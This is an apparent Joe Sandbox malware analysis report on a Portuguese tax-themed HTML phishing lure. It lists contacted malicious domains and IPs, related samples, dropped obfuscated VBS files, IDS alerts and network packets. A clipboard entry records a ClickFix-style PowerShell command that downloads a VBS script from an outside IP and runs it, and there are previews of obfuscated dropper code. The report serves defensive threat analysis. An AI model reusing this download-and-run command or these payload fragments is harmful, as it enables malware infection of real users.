file:///C:/Users/user/Desktop/COMPROVATIVO-25643582-MAIO-CTG6Z-W3OSD%20-%20211.html	0%	Avira URL Cloud	safe
http://3.141.200.118/6126.php:t	0%	Avira URL Cloud	safe
http://3.141.200.118/6126.php	0%	Avira URL Cloud	safe
http://18.218.213.93	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
at-portaldasfinancas.org	195.54.163.111	true	true	unknown
www.google.com	74.125.137.147	true	false	high
s3-r-w.us-east-2.amazonaws.com	16.12.65.210	true	false	high
ld-cxhaspe-20-05-p.s3.us-east-2.amazonaws.com	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://ld-cxhaspe-20-05-p.s3.us-east-2.amazonaws.com/CMiEZso	false	Avira URL Cloud: safe	unknown
http://18.218.213.93/187.php	true	Avira URL Cloud: malware	unknown
http://c.pki.goog/r/r4.crl	false		high
https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.php	true		unknown
file:///C:/Users/user/Desktop/COMPROVATIVO-25643582-MAIO-CTG6Z-W3OSD%20-%20211.html	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ld-cxhaspe-20-05-p.s3.us-east-2.amazonaws.com	powershell.exe, 00000010.00000002.1527728964.0000000005511000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000010.00000002.1528664211.0000000006338000.00000004.00000800.00020000.00000000.sdmp	false		high
http://18.218	powershell.exe, 00000010.00000002.1527728964.0000000005890000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000010.00000002.1527728964.0000000005436000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000010.00000002.1527728964.00000000052E1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000010.00000002.1527728964.0000000005436000.00000004.00000800.00020000.00000000.sdmp	false		high
http://3.141.200.118/6126.php:t	wscript.exe, 00000011.00000002.3230015955.00000000029B8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000010.00000002.1528664211.0000000006338000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000010.00000002.1528664211.0000000006338000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000010.00000002.1528664211.0000000006338000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000010.00000002.1528664211.0000000006338000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000010.00000002.1527728964.00000000052E1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000010.00000002.1527728964.0000000005436000.00000004.00000800.00020000.00000000.sdmp	false		high
http://18.218.213.93	powershell.exe, 00000010.00000002.1527728964.0000000005436000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://3.141.200.118/6126.php	5767.vbs.17.dr	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
18.218.213.93	unknown	United States	16509	AMAZON-02US	true
195.54.163.111	at-portaldasfinancas.org	Ukraine	15626	ITLASUA	true
16.12.65.210	s3-r-w.us-east-2.amazonaws.com	United States	unknown	unknown	false
74.125.137.147	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.7
192.168.2.16
192.168.2.6
192.168.2.5

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1696821
Start date and time:	2025-05-22 14:01:20 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowshtmlcookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	COMPROVATIVO-25643582-MAIO-CTG6Z-W3OSD - 211.html
Detection:	MAL
Classification:	mal100.phis.expl.winHTML@31/9@10/8
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 10 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .html

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe, TextInputHost.exe
Excluded IPs from analysis (whitelisted): 142.250.141.94, 142.250.101.102, 142.250.101.100, 142.250.101.138, 142.250.101.113, 142.250.101.139, 142.250.101.101, 142.250.141.84, 142.250.68.46, 142.250.217.142, 142.250.141.102, 142.250.141.101, 142.250.141.100, 142.250.141.139, 142.250.141.113, 142.250.141.138, 142.250.217.138, 142.250.101.95, 142.250.141.95, 142.251.2.95, 74.125.137.95, 84.201.221.34, 142.250.189.14, 142.251.2.94, 142.250.176.14, 23.66.134.242
Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, translate.googleapis.com, update.googleapis.com, clients.l.google.com, c.pki.goog
Execution Graph export aborted for target powershell.exe, PID 6452 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
08:02:38	API Interceptor	46x Sleep call for process: powershell.exe modified
14:02:36	Clipboard	Run: powershell -windowstyle minimized -Command "$u='http://18.218.213.93/187.php'; $t=$env:temp + '\2539.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t } $action='Habilitar Visualizao de ficheiro DOCx';"

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s3-r-w.us-east-2.amazonaws.com	https://tmsnp.page.link/?link=https://clickme.thryv.com/ls/click?upn=u001.qtV6UEGDvdhe7EscPzk9g-2BluvA4sgh76sV9bq-2FG-2FwLBxMtlIoN-2FUdQPiEXTMHCFMn5OC_bDeGQ8kOKtvzalCYz4sufiL7IQO62jmKUzQI3EVEXeS0QRvHgeARN4Vy602wE0yJoDRLZnmLkUyKh6TbOqbBu7VNtIj92HDvNpFeDH2UEWg8clSOenPodBbVExQJcqq8aimvlSW5IQb-2FvJMpTZb-2Bh-2FzMyCuxP-2Fe-2BmXcGnpyHFKH11BbzkZxHTkgQsxvYVQ2Q6n6K3pKi8aeOvhYCYeysv6RJel-2BdaD6qxGjx2Lcf0qKcr4XieMdaBRfk-2Bms-2BuCMqGq3Te2AnQXOAnHsDCnelxEWbjoe5X1P5zG4yjuZ7-2BTnGKGuMSCyGDFjh865m-2FvWZSn5KUmarR2xgia7GXdj2JA-3D-3D#iugritugh.eugneiung@iungiutgn.tguntu	Get hash	malicious	Unknown	Browse	52.219.93.66
	https://done140.s3.us-east-2.amazonaws.com/ptb.html?user=nicholas.jones@ericksoninc.com	Get hash	malicious	HTMLPhisher	Browse	52.219.108.18
	wrong_beneficiary_pdf______________________.jar	Get hash	malicious	Unknown	Browse	3.5.133.202
	wrong_beneficiary_pdf______________________.jar	Get hash	malicious	Unknown	Browse	52.219.179.50
	Bid_Proposal_1dbLOky3LggPi9T9O4s17l6Qk_Z1xyzga.pdf	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	52.219.103.34
	https://sdo5dce207d-us-east-2.s3.us-east-2.amazonaws.com/ad1b88.html	Get hash	malicious	Unknown	Browse	52.219.103.18
	https://documentsharefiles.s3.us-east-2.amazonaws.com/re.html#m.skowronski@kostal.com	Get hash	malicious	HTMLPhisher	Browse	3.5.132.31
	https://imsva91-ctp.trendmicro.com/wis/clicktime/v1/query?url=https%3a%2f%2fappilux%2dmy.sharepoint.com%2f%3ab%3a%2fg%2fpersonal%2fsecretariat%5fappilux%5flu%2fEe5UD1cl52dHj%2dVLeIpwkDYBBX3sg2bYeM8V7O8pj4eIMw&umid=2C4E7276-3243-0106-B45A-068FB3E2ED70&auth=f169b906840ce9acfa46d9fc91ed05165e9c9b8f-de32ef97c8b75119951b7c637a5ebd9dd5ba33ec	Get hash	malicious	Unknown	Browse	3.5.132.146
	Salary_Adjustment.pdf	Get hash	malicious	HTMLPhisher	Browse	52.219.97.42
	http://insureberry.com	Get hash	malicious	Unknown	Browse	52.219.111.90

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	https://click.convertkit-mail2.com/r8u3nlrrxqboh3e0xx8b2hdwnzn66h7/08hwh9h2xv70qlfl/aHR0cHM6Ly9keFRmRC5ucGFjdndzeXZ3Zi5lcy9ANXN1bGdhN2R4MGhKLw==#fakeemail@fakedomain.com	Get hash	malicious	Tycoon2FA	Browse	3.141.222.179
	na.elf	Get hash	malicious	Prometei	Browse	54.171.230.55
	YourToDo.svg	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse	3.167.212.129
	boatnet.arm7.elf	Get hash	malicious	Mirai	Browse	34.249.145.219
	Nf-Nota--278.msi	Get hash	malicious	AteraAgent	Browse	18.154.144.23
	na.elf	Get hash	malicious	Prometei	Browse	75.2.37.224
	na.elf	Get hash	malicious	Prometei	Browse	54.171.230.55
	boatnet.arm5.elf	Get hash	malicious	Mirai	Browse	34.254.182.186
	boatnet.mpsl.elf	Get hash	malicious	Mirai	Browse	34.249.145.219
	boatnet.arm6.elf	Get hash	malicious	Mirai	Browse	34.249.145.219
ITLASUA	payments_19.05.2025_222.js	Get hash	malicious	RMSRemoteAdmin	Browse	130.0.235.156
	jBHaOgbMww.exe	Get hash	malicious	NetSupport RAT	Browse	82.118.16.145
	jBHaOgbMww.exe	Get hash	malicious	NetSupport RAT	Browse	82.118.16.145
	Ll57CUTdDq.exe	Get hash	malicious	NetSupport RAT	Browse	82.118.16.145
	Ll57CUTdDq.exe	Get hash	malicious	NetSupport RAT	Browse	82.118.16.145
	owari.mips.elf	Get hash	malicious	Unknown	Browse	217.12.214.62
	http://130.0.235.242/0x55/3	Get hash	malicious	Unknown	Browse	130.0.235.242
	n397UdH3b5.exe	Get hash	malicious	Wannacry, Conti	Browse	217.12.199.208
	sora.arm7.elf	Get hash	malicious	Mirai	Browse	217.12.215.199
	main_x86.elf	Get hash	malicious	Mirai	Browse	82.118.16.134

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	https://click.convertkit-mail2.com/r8u3nlrrxqboh3e0xx8b2hdwnzn66h7/08hwh9h2xv70qlfl/aHR0cHM6Ly9keFRmRC5ucGFjdndzeXZ3Zi5lcy9ANXN1bGdhN2R4MGhKLw==#fakeemail@fakedomain.com	Get hash	malicious	Tycoon2FA	Browse	20.109.210.53
	YourToDo.svg	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse	20.109.210.53
	https://www.hep2go.com/	Get hash	malicious	Unknown	Browse	20.109.210.53
	Transaktion auf Ihrem SwissPass-Karte.eml	Get hash	malicious	Unknown	Browse	20.109.210.53
	https://linklock.titanhq.com/analyse?url=https%3A%2F%2Fassets-eur.mkt.dynamics.com%2F4be65406-5c35-f011-9a43-000d3a479675%2Fdigitalassets%2Fstandaloneforms%2F38b53eef-1d36-f011-8c4e-000d3a28d740&data=eJxFjsEOwiAQRL-mvdHQAm09cPDi2T8w211QYgHTRaN_L0YTk73MzszLoB2Npl6rARCXqSX7gDUQdI7baA2KZzYEt9MxtmzDA1KjpQ8Jgc-wYYAOc2w3G5LP1fl37_ZSyo0btW-GQz1gdoWFu29dvJaOXgliQP7Uq6sXV2fIURhURnjZ92IHWgkpJSnQ026cTI1ROIcC65dVNRdIBGtOzuctfj5qXoxyzoue1PgFzajdDzTMNGn5BpDqTH8%	Get hash	malicious	HTMLPhisher	Browse	20.109.210.53
	https://wearychallengeraise.com/	Get hash	malicious	Unknown	Browse	20.109.210.53
	REMITTANCE ADVICE.pdf	Get hash	malicious	Unknown	Browse	20.109.210.53
	f.bat	Get hash	malicious	Unknown	Browse	20.109.210.53
	http://wearychallengeraise.com	Get hash	malicious	Unknown	Browse	20.109.210.53
	https://nqvam.com/?booking/559fe28e-6f52-4571-9fe2-bc135f3f683a	Get hash	malicious	Unknown	Browse	20.109.210.53
3b5074b1b5d032e5620f69f9f700ff0e	aa964950-0347-4198-ac21-31b87407ca7a#U00bf.exe	Get hash	malicious	Unknown	Browse	16.12.65.210
	WindowsSeucre.bat	Get hash	malicious	Braodo	Browse	16.12.65.210
	r00006_E991DF982E4A4914AA972EC0657DE68F_2_.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	16.12.65.210
	SecuriteInfo.com.Adware.DownwareNET.4.20690.20670.exe	Get hash	malicious	Unknown	Browse	16.12.65.210
	SecuriteInfo.com.Adware.DownwareNET.4.20690.20670.exe	Get hash	malicious	Unknown	Browse	16.12.65.210
	pmHpA1RxxI.lnk	Get hash	malicious	Python Stealer	Browse	16.12.65.210
	f.bat	Get hash	malicious	Unknown	Browse	16.12.65.210
	f.bat	Get hash	malicious	Python Stealer	Browse	16.12.65.210
	TbZIvfs3kq.exe	Get hash	malicious	AsyncRAT, Quasar	Browse	16.12.65.210
	Member-list-request-travel-SGA Group.bat	Get hash	malicious	Braodo	Browse	16.12.65.210

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1340
Entropy (8bit):	5.410101907711358
Encrypted:	false
SSDEEP:	24:3nyt7WSKco4KmM6GjKbmOIl+mN1s4RP09tEoUEJ0gt/NK3R8IHrGK:XyxWSU4Yym/+ms4Rc9tEoUl8NWR8IHf
MD5:	9BE127C7CE273F4FBCDC96E9C6ED71C6
SHA1:	D323ED062DD0D200BD9F45B3C54C237118120CA9
SHA-256:	137B16180FA1DC71868402F6532920B8CF4CD4424C4659F038A9C46830EC45CD
SHA-512:	D4F48760CBAB65B9FE41B1D49143D7BB75E581DB98735D9569BF144C7D22AE1651E6E8922769C67B8424BEB220C44AA044ED0FC7C52262ABDE442649E2F1BB6F
Malicious:	false
Reputation:	low
Preview:	@...e.................................^..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<...............V.}...@...i...........System.Transactions.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\2539.vbs

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with very long lines (755), with CRLF line terminators
Category:	dropped
Size (bytes):	2917563
Entropy (8bit):	4.364130192557182
Encrypted:	false
SSDEEP:	6144:dIhLPx+ytt1uTdufXd2niKva1BB9TzHKAPJXWrSeFWpDRC5MxssjMvK/:d0Z+yxfdmuRvP9wSMUDRC5Qf/
MD5:	AD0C0ED37D08E1DC3DFD9AA4CBEFAFBC
SHA1:	F5D1C63D8885DA7CB278B63FD1DC846EB4F6B7E8
SHA-256:	B746FB314B22C3B66F70D2E6A7346286291C2B4A57FCBBB207C584E2E77FC6E6
SHA-512:	F91F05A259AC57531A1C55848A5BEE34F63A6BFE17471B611CE3094CA5F572D741D6DC2699789295667471EA6B03981D75897A9F55C121725B9CB5412C09C2FC
Malicious:	true
Reputation:	low
Preview:	..KSaJnxZFRbeaIBzQAwoQxtIXRWVsBbphYhxDEqv = sHjGnny0(82) + sHjGnny0(71) + sHjGnny0(99) + sHjGnny0(88) + sHjGnny0(75) + sHjGnny0(67) + sHjGnny0(98) + sHjGnny0(104) + sHjGnny0(106) + sHjGnny0(78) + sHjGnny0(109) + sHjGnny0(115) + sHjGnny0(83) + sHjGnny0(102) + sHjGnny0(81) + sHjGnny0(66) + sHjGnny0(115) + sHjGnny0(75) + sHjGnny0(68) + sHjGnny0(106) + sHjGnny0(99) + sHjGnny0(106) + sHjGnny0(113) + sHjGnny0(108) + sHjGnny0(101) + sHjGnny0(109) + sHjGnny0(98) + sHjGnny0(87) + sHjGnny0(74) + sHjGnny0(113) + sHjGnny0(111) + sHjGnny0(108) + sHjGnny0(74) + sHjGnny0(107) + sHjGnny0(120) + sHjGnny0(110) + sHjGnny0(86) + sHjGnny0(86) + sHjGnny0(108) + sHjGnny0(77) + sHjGnny0(116) + sHjGnny0(74) + sHjGnny0(86) + sHjGnny0(71) + sHjGnny0(69) + sHjGnny0(90)..YUtOQCBcWRbCTobdzzbknZLOzOGclfHmyLgJhga = sHjGnny0(118) + sHjGnny0(82) + sHjGnny0(68) + sHjGnny0(82) + sHjGnny0(84) + sHjGnny0(122) + sHjGnny0(113) + sHjGnny0(117) + sHjGnny0(107) + sHjGnny0(101) + sHjGnny0(120) + sHjGnny0(82) + sHjGnny0(108) + sH

C:\Users\user\AppData\Local\Temp\5767.vbs

Download File

Process:	C:\Windows\SysWOW64\wscript.exe
File Type:	Non-ISO extended-ASCII text, with CRLF, NEL line terminators
Category:	modified
Size (bytes):	86122
Entropy (8bit):	6.069977572017507
Encrypted:	false
SSDEEP:	1536:DpuC1Lc46+qJrF4JU8tM7G+orZIKyvhYE892N8NSQpiZX0OkZWfIJYxU:DpuIY46+urF4U8OSFrZI2Z2CSQp6X5kp
MD5:	3B1A016D264172B9A606F194B0956AE8
SHA1:	FD886CF89ABF239AE6D0528A5A6B0CB7788ED1A6
SHA-256:	33E93898DF6AA0CBFF75B887046517657158985C42AA53F5869CF75CC77130B7
SHA-512:	BBAF4A5252FE1101E42B4C9F4D1AF2B629FED7F8548B2CE06B058FCF791034EEF9E0070123F0BEEC009CF00552075DBD76CD1AC66DE386F5705E3E511FADDA76
Malicious:	true
Reputation:	low
Preview:	hyiVtowsHYgmrjTbeRC = ".........................................................................................................................................."..iAsCAZHPLLAkKtdnGLc = "......................................................................................................................................."..rqBwowDsGtbrPMKrdwu = "......................................................................................................................................."..lagNDVMhcTTWubkTTPw = ".........................................................................................................................................."..YSZestEbJhjQTpSDCJK = "........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0b2rk1rc.rjg.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sxe5w40a.ajj.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Chrome Cache Entry: 120

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, Unicode text, UTF-8 (with BOM) text, with very long lines (65520), with CRLF line terminators
Category:	downloaded
Size (bytes):	1103218
Entropy (8bit):	5.622741062614011
Encrypted:	false
SSDEEP:	24576:rJWVBAsWyUAP8FJnsnOGVOfxszDHvTTDEtoMcLAP:rJFw8v2V2IY9
MD5:	67B5307A648E2E45F54E30838C32F1BA
SHA1:	8840318FB53E07CE7621D99F0D86DF380F5AD2A2
SHA-256:	DD4B7EDB4AF18F59A3EFAD5C2429704A0812AB24B441A82058F461FD7D6563BE
SHA-512:	922B90AA9F4694ADD89C6C929B736E1CCCBF818FEBB8493D06CBD0B7ADACADCEAF547A67CE12370407E049B770FD457350F593FED137008D33AC6556C448D79D
Malicious:	false
URL:	https://at-portaldasfinancas.org/FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.php
Preview:	..<script>..document.write(unescape('%3C%21DOCTYPE%20html%3E%0D%0A%3Csummary%20hidden%3Egdxdpabwlfrvdpyiwlhkrswldvvftbforhehdsakinpycykfuydxaixkxrzeroaweoaaqmqlfvgwxxmififfgpksjjhsnibtdojwjpdrawdgiuymsmpcpysbpvkrgtfcijjutoyxbszajevnbmposymnadebyorypdnvnbwjtqujiwmthqvtjmniftvfbqwqdiniqeukxdvstyjnuobfssxzbjqreglslrhyhdarmapsiriqackrbzbhquhfguhbceamykyariwidrjzviddzyngjgrxkyprbaedjtkqbhqrmsuthqwuildcvdxaaqtzorkekegwineeuwdlqokdepbkxcjctblmyvsgjxukmsynyletnzuxwupxsbrznrpbznhfrmmcuytrwaypqzjbzrjppdtrmejtnxnebpbcrmptxkuedwsxicftfurlzlcwumemlimvywteoqezhhpvaegxjpxxssoaeyctawzwowrppaxsqberkhvufnzvokpbkhpvisadtndaaebizhribbnmdsvgqekajtbwaqitbcdndwwzjhtbvjfetopmkakfhseecqweedzpldxddsditjykwtqblcfhnzwkszxyckdwsjynuizyejdzrdpusvtzvmkjjcxabzjhabbcegousbjwmyjriyflcleetupnpbszoanajwlefhmixmabriazmiwfwbxvlgjlxjvupslosdpxwmamleuelwmcwddpniwgujucmrrqobailwzsmzmvrzdrfnrsdgzkhplwuukljpkqzstvzifaczi%3C%2Fsummary%3E%0D%0A%3Cbutton%20hidden%3Eryiiujrbpwdiomffyroddmmchglcvgsoemauefgpifixegykklpgtuobdxuqkn

Chrome Cache Entry: 121

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (328), with no line terminators
Category:	downloaded
Size (bytes):	328
Entropy (8bit):	4.115663679637743
Encrypted:	false
SSDEEP:	6:hr3333H02H02H02H0s0s02H0233H02H0s02H02HZ:93333FFFVF33FHF5
MD5:	87144FE2EB35D22216D5A4C217AB3464
SHA1:	172764B61A6A0C5083F8D3532549A62C79DEEF97
SHA-256:	7045C489D2DF01B4511E9133BDC6AFE67B9BA01D774EE1BF45045800F6D322DA
SHA-512:	C305C8E711BBE4B78C612E9CC74A64827725D663635848C20BDBA160F533100D318CDD571CDF9DD18C7E7D7A5D6F45C25E0A41645336EC552C9EFC301336E8EC
Malicious:	false
URL:	https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhLPAQl3DJaOmnG0jRIFDZFhlU4SBQ2RYZVOEgUNkWGVThIFDZFhlU4SBQ2RYZVOEgUNBu27_xIFDZFhlU4SBQ0G7bv_EgUNkWGVThIFDQbtu_8SBQ2RYZVOEgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNkWGVThIFDQbtu_8SBQ2RYZVOEgUNkWGVThIFDZFhlU4SBQ0G7bv_EgUNkWGVThIFDQbtu_8SBQ0G7bv_EgUNkWGVThIFDQbtu_8SBQ2RYZVOEgUNBu27_yFEudBBNUJd0w==?alt=proto
Preview:	CvMBCgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNBu27/xoACgcNkWGVThoACgcNBu27/xoACgcNkWGVThoACgcNBu27/xoACgcNkWGVThoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNkWGVThoACgcNBu27/xoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNBu27/xoACgcNkWGVThoACgcNBu27/xoACgcNBu27/xoACgcNkWGVThoACgcNBu27/xoACgcNkWGVThoACgcNBu27/xoA

Static File Info

General

File type:	exported SGML document, Unicode text, UTF-8 text, with very long lines (6905), with CRLF line terminators
Entropy (8bit):	5.748351677353468
TrID:	HyperText Markup Language (11501/1) 33.82% HyperText Markup Language (11501/1) 33.82% HyperText Markup Language (11001/1) 32.35%
File name:	COMPROVATIVO-25643582-MAIO-CTG6Z-W3OSD - 211.html
File size:	858'589 bytes
MD5:	5bff0201cca937273258865c37dd7e10
SHA1:	d8039649e5f86fe97b471c1cc543e769bc872639
SHA256:	eb8425ff4b0275a6f4e76147a2e9245f5fd652e70bb4e6e8b95718189100ae3c
SHA512:	b1d8dc3b2cf0f60a70ca25bdf61eaadc3fc8c555d625ccff97bfcb99e4febe82d59e122f918b184d1a1344fb2741fdb01a4adad12dd2e9f14e7fbec20c884c9d
SSDEEP:	12288:yaaQeTIvhUWJ/BdKt6biW5iH6GNgtt2dddddddqLEfyfyfyfyfH4lNO3/0/0/0/F:yaaTehZhBdKtQkNst2dddddddqLfvOUT
TLSH:	0A050789A0857BA0764E902A52DAFC8D45243C37E36CCB79D53557C3F9212C3B96BE0B
File Content Preview:	...rO.....$....S...........g.............._!..........................W..0P........................3q..............T................3...r..................Vj....d.....................................S...br...............v1..................E.........

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-05-22T14:02:40.778175+0200	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	2	192.168.2.6	49708	18.218.213.93	80	TCP
2025-05-22T14:02:40.778175+0200	2057788	ET MALWARE Clickfix Style Post-Infection CnC Request (GET)	1	192.168.2.6	49708	18.218.213.93	80	TCP
2025-05-22T14:02:41.811558+0200	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	2	192.168.2.6	49709	16.12.65.210	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 22, 2025 14:02:13.263350964 CEST	49672	443	192.168.2.6	204.79.197.203
May 22, 2025 14:02:13.566106081 CEST	49672	443	192.168.2.6	204.79.197.203
May 22, 2025 14:02:14.178807020 CEST	49672	443	192.168.2.6	204.79.197.203
May 22, 2025 14:02:15.394263029 CEST	49672	443	192.168.2.6	204.79.197.203
May 22, 2025 14:02:17.967847109 CEST	49672	443	192.168.2.6	204.79.197.203
May 22, 2025 14:02:21.168977022 CEST	49678	443	192.168.2.6	20.42.65.91
May 22, 2025 14:02:21.480725050 CEST	49678	443	192.168.2.6	20.42.65.91
May 22, 2025 14:02:21.635936975 CEST	49692	443	192.168.2.6	74.125.137.147
May 22, 2025 14:02:21.636038065 CEST	443	49692	74.125.137.147	192.168.2.6
May 22, 2025 14:02:21.636137009 CEST	49692	443	192.168.2.6	74.125.137.147
May 22, 2025 14:02:21.636507034 CEST	49692	443	192.168.2.6	74.125.137.147
May 22, 2025 14:02:21.636528015 CEST	443	49692	74.125.137.147	192.168.2.6
May 22, 2025 14:02:22.020194054 CEST	443	49692	74.125.137.147	192.168.2.6
May 22, 2025 14:02:22.020267010 CEST	49692	443	192.168.2.6	74.125.137.147
May 22, 2025 14:02:22.022902966 CEST	49692	443	192.168.2.6	74.125.137.147
May 22, 2025 14:02:22.022926092 CEST	443	49692	74.125.137.147	192.168.2.6
May 22, 2025 14:02:22.023575068 CEST	443	49692	74.125.137.147	192.168.2.6
May 22, 2025 14:02:22.064212084 CEST	49692	443	192.168.2.6	74.125.137.147
May 22, 2025 14:02:22.090059996 CEST	49678	443	192.168.2.6	20.42.65.91
May 22, 2025 14:02:22.777810097 CEST	49672	443	192.168.2.6	204.79.197.203
May 22, 2025 14:02:23.294024944 CEST	49678	443	192.168.2.6	20.42.65.91
May 22, 2025 14:02:23.620426893 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:23.620474100 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:02:23.620534897 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:02:23.622773886 CEST	49697	443	192.168.2.6	195.54.163.111
